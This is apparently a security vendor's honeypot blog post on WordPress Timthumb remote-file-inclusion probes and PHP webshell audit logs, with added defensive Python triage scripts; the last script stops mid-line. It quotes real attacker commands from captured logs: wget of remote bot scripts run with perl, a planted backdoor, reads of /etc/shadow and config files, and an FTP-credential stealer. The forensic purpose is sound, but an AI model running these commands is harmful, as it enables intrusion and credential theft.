[Honeypot Alert] Inside the Attacker's Toolbox: Webshell Usage Logging

In a previous blog post, we discussed the common lifecycle of web server botnet recruitment. While installing Perl IRC botnet scripts is a common post-exploitation tactic, it is by no means the only method used to interact with or control compromised websites. This blog post will outline how attackers use webshell/backdoor pages, and the audit log file those webshells often leave behind.

Initial Compromise

The initial attack vector most often used is either Remote File Inclusion (RFI) or remote code execution through the Timthumb image-resizing script that ships with many WordPress themes and plugins. Here are example attacks captured today in our web honeypots. Note that a single source IP probes a long list of theme and plugin paths, and that every request here drew a 404 because the honeypot does not host those files:

200.151.187.18 - - [19/Jun/2013:00:54:20 +0200] "GET /wp-content/themes/Apz.v1.0.2/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:03 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:12:43 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:06 +0200] "GET /wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:08 +0200] "GET /logs/wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:15:34 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:22:49 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:24:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:29:47 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:04:10:54 +0200] "GET /wp-content/themes/TheSource/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:03 +0200] "GET //wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:04 +0200] "GET /logs//wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:09:55 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:18:29 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:11 +0200] "GET //wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:12 +0200] "GET /logs//wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:25:15 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:32:33 +0200] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:33:48 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:41:43 +0200] "GET //wp-content/themes/yamidoo/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:42:34 +0900] "GET /wp-content/themes/ecobiz/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 243
200.151.187.18 - - [19/Jun/2013:08:58:39 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:01:47 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:20:11 +0200] "GET //wp-content/themes/EspOptimizePress/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:03:53 +0200] "GET //wp-content/themes/corporattica/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:14:38 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:20:37 +0200] "GET //wp-content/themes/digitalfarm/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:24:49 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:28:17 +0200] "GET //wp-content/themes/DelicateNews/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:28:51 +0200] "GET //wp-content/themes/kingsize/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:30:22 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:34:50 +0200] "GET //wp-content/themes/bigeasy/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:37 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:59 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:41:20 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:09 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:10 +0200] "GET /logs//wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:41 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:42 +0200] "GET /logs//wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:11:26:11 +0200] "GET //wp-content/themes/premiumnews/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:12:24:58 +0900] "GET //wp-content/themes/classifiedstheme/thumbs/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 249
200.151.187.18 - - [19/Jun/2013:14:20:43 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:14:26:34 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:15:33:15 +0900] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:16:02:13 +0900] "GET //wp-content/themes/MyResume/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:17:15:16 +0900] "GET //wp-content/themes/eVidTheme/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 247

In all of these examples, the attacker is attempting to trick the PHP application into downloading and executing the remote file hxxp://flickr.com.golfpops.com/thumbid.php. The hostname is deliberately built to contain "flickr.com", one of the image hosts Timthumb allowed remote fetches from: the vulnerable releases matched the allowed domains as substrings of the hostname instead of requiring the hostname to end in the allowed domain, so an attacker-controlled name under golfpops.com passes the check and the attacker's PHP file is fetched into the site's cache directory.
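To make that pattern mechanical, here is an added example (not from the original post and not Timthumb's own code) that triages Apache access-log lines for Timthumb-style requests: it pulls the src parameter out of the query string and compares the vulnerable substring allowlist check, modeled on the one in the affected Timthumb releases, with a proper suffix match. The allowlist contents, the sample log lines (two copied from the capture above plus one constructed benign request) and the function names are assumptions of the example.

```python
"""Triage Apache access-log lines for Timthumb-style remote 'src' fetches."""
import re
from urllib.parse import urlparse, parse_qs

# Apache combined log format; referer/user-agent are not required so the shorter
# common-format lines (like the +0900 honeypot entries above) also parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Hosts Timthumb would fetch from. Modeled on the allowlist shipped with the
# vulnerable releases; treat the exact contents as an assumption of this example.
ALLOWED_SITES = ("flickr.com", "picasa.com", "blogger.com", "wordpress.com", "img.youtube.com")


def host_allowed_vulnerable(host):
    """Substring match: the check that lets flickr.com.golfpops.com through."""
    host = host.lower()
    return any(site in host for site in ALLOWED_SITES)


def host_allowed_fixed(host):
    """Suffix match on a dot boundary: the host must be the allowed domain or a subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)


def classify_src(src):
    """Label a src= value as local, allowed, allowlist-bypass or remote-denied."""
    u = urlparse(src)
    if u.scheme not in ("http", "https") or not u.hostname:
        return "local"
    if host_allowed_fixed(u.hostname):
        return "allowed"
    if host_allowed_vulnerable(u.hostname):
        return "allowlist-bypass"  # vulnerable code fetches it, fixed code refuses
    return "remote-denied"


def triage(log_text):
    """Return one finding per request whose src points at a host the fixed check would refuse."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Collapse leading '//' so urlparse does not read the first path segment as a host.
        target = urlparse(re.sub(r"^/+", "/", m.group("target")))
        src_values = parse_qs(target.query).get("src")
        if not src_values:
            continue
        verdict = classify_src(src_values[0])
        if verdict in ("local", "allowed"):
            continue
        findings.append({
            "ip": m.group("ip"), "time": m.group("time"), "status": int(m.group("status")),
            "path": target.path, "src": src_values[0], "verdict": verdict,
        })
    return findings


# Constructed sample: two lines copied from the honeypot capture above plus one benign
# request for a real flickr.com image, which the fixed check must still allow.
SAMPLE_LOG = """\
200.151.187.18 - - [19/Jun/2013:00:54:20 +0200] "GET /wp-content/themes/Apz.v1.0.2/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:42:34 +0900] "GET /wp-content/themes/ecobiz/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 243
203.0.113.7 - - [19/Jun/2013:09:00:00 +0200] "GET //wp-content/themes/foo/timthumb.php?src=http://farm1.static.flickr.com/1/photo.jpg&w=100 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f'{f["time"]}  {f["ip"]}  {f["verdict"]}  {f["path"]}  src={f["src"]}')
```

Run against a real access log, the "allowlist-bypass" verdict on a 200 response is the line to worry about; a 404, as in the honeypot, means the probed path did not exist. The fixed check is the shape any host allowlist should take: compare on a dot boundary, never with a substring test.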

Post-Compromise Actions

This webshell has functionality similar to the following redacted example -

[Screenshot: redacted webshell interface, "View File" component]

This webshell provides extensive functionality for the attacker. In this screenshot, the attacker is using the "View File" component. The resulting URL looks like this -

http://VICTIM_SITE/wp-includes/theme-compat/wp-targz.php?x=f&f=wp-config.php&d=%2Fhome%2Ffoo%2Fpublic_html&cd=2&hl=en&ct=clnk&gl=us

The "f" parameter is the file the attacker is viewing through this webshell, and the "d" parameter is the URL-encoded directory it lives in. As you can see, the attacker is able to inspect the wp-config.php file contents, which disclose sensitive data such as the database username and password. This type of data leakage can lead to deeper compromise, for example direct access to the database if it is reachable from outside, or reuse of the same credentials elsewhere. Other examples of actions include:

[Screenshot: other actions offered by the webshell]

Attackers can even edit existing files to try to cover their tracks, including the web server's own logs. This screenshot shows an example of editing the Apache access_log file, which is why the access log on a compromised host cannot be trusted as a complete record of what happened:

[Screenshot: editing the Apache access_log file through the webshell]

Webshell Usage Logging

While reviewing these webshell files, we found that many include audit logging as part of the backdoor. For example, let's look at the source of that thumbid.php script again:

[Screenshot: PHP audit-logging code from thumbid.php]
This section of PHP code creates an audit log file called "x.txt" in the document root directory of the website and appends a record of every interaction a web client has with the webshell: the timestamp, the client IP, the User-Agent string, the URL of the webshell itself and the last command issued. Here are some examples SpiderLabs has obtained which show past commands used.

Example 1:

Day  : Mon, 03 Jun 2013 22:05:39 -0300
IP  : 188.83.6.147
Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.php
Last Command : id
_____________________________________________________________________________________
Day  : Mon, 03 Jun 2013 22:05:52 -0300
IP  : 188.83.6.147
Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.php
Last Command : wget http://mail.ebsuccess.com/accounts/inc/bot1.txt; perl bot1.txt; rm -rf bot1.txt
_____________________________________________________________________________________

These entries show that the attacker first ran the "id" command to see which user the webshell was running as. She then downloaded a file with wget, executed it with perl, and removed it to clean up. Note that the webshell itself sits in a theme's cache directory under a hash-like name, exactly where a Timthumb fetch would have written it.

Example 2:

Day     : Wed, 05 Jun 2013 19:36:43 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : edit_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:37:54 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:38:19 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : wget http://193.180.115.30/~online/php/c100.gif ; mv c100.gif fantastico.php ; chmod +x *.php ; ls -alF
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:40:18 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : cat .htaccess
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:40:47 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp* ; perl ftp
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:41:24 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : hostname ; /sbin/ifconfig | grep inet ; cat /etc/passwd /etc/shadow /root/.my.cnf /etc/group ; ls -alF /etc/passwd /etc/shadow /root/.my.cnf /etc/group
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:42:02 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : netstat -an | grep -i listen
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:46:06 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : rm -f ftp ftp.txt ; ls -al
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:47:16 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : cat /home/XXXX/public_html/blog/configuration.php
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:47:56 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : find `pwd` -type f -name \"*thumb*.php\" -exec ls -alF {} \\;
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:59:54 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp*
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:00:03 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : edit_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:00:56 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:01:05 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:03:29 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : edit_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:04:02 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:04:19 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:05:31 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:06:57 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:07:10 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:09:34 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:10:01 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:10:08 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:11:08 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:11:12 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:12:34 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:12:46 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:17:01 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : save_file
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 20:17:16 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : perl ftp
_____________________________________________________________________________________
Day     : Thu, 06 Jun 2013 13:30:30 -0500
IP      : 109.167.225.109
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : rm -f ftp ftp.txt ; ls -alF
_____________________________________________________________________________________

This particular attacker executed many commands, as you can see. Several stand out: the download of c100.gif, renamed to fantastico.php and marked executable, which plants a second backdoor under an innocuous name; the attempt to read /etc/passwd, /etc/shadow, /root/.my.cnf and /etc/group (the shadow and my.cnf reads only succeed if the web server runs with enough privilege to open them); reading .htaccess and a /home/XXXX/public_html/blog/configuration.php file for more credentials; a netstat for listening services; and the long edit_file / save_file / perl ftp cycle, which is the attacker debugging a script directly on the victim's server. The most notable, though, was downloading and running this program -

[Screenshot: source of the downloaded Perl script, confspy.pl]
The "confspy.pl" script (fetched and run as "ftp" in the log above) searches users' home directories and attempts to steal their FTP credentials. Knowing that a tool like this has been run on your system widens the scope of compromise: every user on the host would need to change their passwords to prevent the attacker from regaining access, even if you patch the original Timthumb attack vector.

Takeaways

After analyzing these types of webshell backdoors for quite some time, it is clear that the majority of these attackers are simply re-using webshells written by others. They modify the page TITLE or color scheme to take some cosmetic ownership of the code, and little else. This is one of the main reasons why this audit logging code persists in these webshells. In addition to the more common audit log name of "x.txt", you should also look for "logx.txt", as that has been seen quite frequently as well. If you suspect a site is compromised, search the document root for files with those names and preserve a copy before touching anything else. Hopefully this information will help you if you find that your website has been compromised and you are trying to identify what actions the attacker executed.
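As an added example (not part of the original post, and not the webshell's own code), here is a small Python triage script for the log files named above: it walks a document root for x.txt and logx.txt, splits each file into records on the underscore separator, parses the Day / IP / Browser / Url / Last Command fields, tags each command with coarse behaviour labels and pulls out download URLs as indicators. The one-field-per-line layout of the sample is an assumption about how the webshell writes the file; the post shows the entries run together, and the parser accepts both. The sample records are copied from Examples 1 and 2 above; the tag patterns and function names are the example's own.

```python
"""Triage the audit log (x.txt / logx.txt) that many PHP webshells leave in the document root."""
import os
import re
from email.utils import parsedate_to_datetime

# File names the post reports for the webshell's own audit log.
AUDIT_LOG_NAMES = {"x.txt", "logx.txt"}

# One record per webshell request. Field order is fixed; whitespace between fields is
# optional so that records with or without line breaks parse the same way.
ENTRY_RE = re.compile(
    r"Day\s*:\s*(?P<day>.*?)\s*"
    r"IP\s*:\s*(?P<ip>.*?)\s*"
    r"Browser\s*:\s*(?P<browser>.*?)\s*"
    r"Url\s*:\s*(?P<url>.*?)\s*"
    r"Last Command\s*:\s*(?P<cmd>.*?)\s*$",
    re.S,
)

# Coarse behaviour tags for "Last Command" values. Heuristic patterns chosen for this
# example; extend them for your own cases.
INDICATORS = {
    "download": r"\b(?:wget|curl|fetch|lwp-download)\b",
    "execute": r"\b(?:perl|python|php|sh|bash)\s+\S+",
    "cleanup": r"\brm\s+-r?f\b",
    "credential-access": r"/etc/shadow|wp-config\.php|configuration\.php|\.my\.cnf|\.htpasswd",
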